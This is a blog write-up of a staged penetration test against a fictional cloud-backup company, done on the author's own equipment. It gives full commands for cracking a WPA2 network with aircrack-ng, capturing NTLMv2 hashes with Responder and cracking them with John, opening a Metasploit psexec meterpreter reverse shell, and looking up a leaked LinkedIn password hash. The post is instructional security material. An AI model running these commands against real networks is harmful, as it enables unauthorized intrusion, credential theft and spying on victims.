One Eyed Techs

127.0.0.1 WHOIS

06/09-2018

Case Competition

This scenario, was written as a case competition for a cyber security presentation. The presentation treated the scenario as a penetration test of an online company, offering backups in the cloud. The name of the company is Digi-Sikring ApS.

No laws were broken in creating and documenting this scenario. All tests were performed on my private property.

The following segment of the scenario is executed as an external threat agent.


Part 1: Got wifi?

First step is to enable monitor mode on the network interface card.

root@parrot:~$ sudo airmon-ng start wlan0
Monitor mode

Next up, I'm scanning wireless networks with the network card in monitor mode.

This is done with the following command:

root@parrot:~$ sudo airodump-ng wlan0mon

While scanning, a network called digisikringaps-2.4Ghz appears.

Airodump

The next step is to narrow down monitoring, to the network in interest. With the following command, the network: digisikringaps-2.4Ghz is monitored, and the data is saved to the Desktop.

root@parrot:~$ sudo airodump-ng -c 1 --bssid E0:B9:E5:A5:4D:27 -w /home/root/Desktop/digisikringaps-wifi wlan0mon
Airodump Digi Sikring ApS

The files with the captured data are stored on the Desktop. The most important being the .cap file. However, It's far more interesting once it contains the four way handshake, which is the authentification method for network with WPA2 encryption.

Capture files

To capture the four way handshake, a device is needed to authenticate with the network. Instead of waiting for said authentication, a deauthentication attack can be launched against connected devices. This forces devices off of the network. They will most likely auto-connect, enabling me to capture the handshake. To launch the deauthentication attack to the only device connected, the following command is executed:

root@parrot:~$ sudo aireplay-ng -0 2 -a E0:B9:E5:A5:4D:27 -c 84:29:99:18:CD:33 wlan0mon

The attack was succesful and the terminal monitoring the network now displays the capture of the four way handshake.

Airodump handshake

If the .cap-file is opened in Wireshark and the four way handshake can be seen. It employs EAPOL (extensible authentication protocol over LAN), which is the authentification protocol.

EAPOL capture

The password within the .cap file, can be cracked with the aircrack software from the aircrack-ng suite. This allows the attacker to bruteforce the password with words from a password list.

The command executed is as follows.

root@parrot:~$ sudo aircrack-ng -a2 -b E0:B9:E5:A5:4D:27 -w /usr/share/wordlists/fern-wifi/common.txt /home/root/Desktop/digisikringaps-wifi/*cap

Since the wireless network password is in the wordlist used, it is cracked within seconds.

Aircrack

Part 2: Houston, we have a shell

After connecting to the network, I'd like to determine the default gateway in order to discover hosts connected to the network.

root@parrot:~$ route -n
Default Gateway

The default gateway is 192.168.1.1. To discover connected hosts I'll scan every IP address on the network. To do this I'll use nmap.

root@parrot:~$ sudo nmap -sP -PI -PT 192.168.1.0/24
Nmap Scan

The connected device with IP: 192.168.1.112, looks like a Windows machine. Let's target that. To attack the device, I'll use responder. When a non existing hostname is entered into a browser, the computer will ask other devices connected to the network, if they recognize the hostname. Responder tells the computer that itself is the IP behind the unrecognized hostname, resulting in the target computer is sending their login credentials. The name in cleartext and the password in a hashed with NTLMv2.

root@parrot:~$ sudo responder -I wlan0 -wv
Responder

The hashes are stored in /usr/share/responder/logs.

root@parrot:~$ cd /usr/share/responder/logs 

I'll use john the ripper to attempt cracking the NTLMv2 hash.

root@parrot:~/usr/share/responder/logs$ john SMBv2-NTLMv2-SSP-192.168.1.112.txt
John the Ripper

John cracked the NTLMv2 Hash in under a second. This emphasizes the importance of not relying on a weak password.

The psexec allows for authenticated remote code execution on a target system. Let's use a reverse shell as payload to execute.

First some parameters are to be set.

root@parrot:~$  msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set smbroot johs
msf exploit(windows/smb/psexec) > set smbpass password1
msf exploit(windows/smb/psexec) > set lhost 192.168.1.162
msf exploit(windows/smb/psexec) > set rhost 192.168.1.112

And finally.

msf exploit(windows/smb/psexec) > exploit
Meatsploit

We're in. Printing working directory let's us know that we have a shell open in C:\Windows\System32.

Furthermore, we can launch Armitage, a graphical root interface for the metasploit framework, and grab a picture through the webcam of the compromised computer.

Armitage Webcam

Part 3: Correct horse battery stable

The third part is an example of compromisation of an employee from the outside. Using maltego, we can search the employers name.

An e-mail is associated with the name of the employee. Digging a little deeper, it appears that the e-mail of the employee has been in a password leak.

Maltego

Obtaining the LinkedIn database let's ud find the SHA1 hash of used password.

LinkedIn

The SHA1 hash is not considered safe as per 2018. Searching the hash in online databases, revealed that the hash indeed had been cracked.

Maltego

This concludes the hypothetical pentest done as a case competition.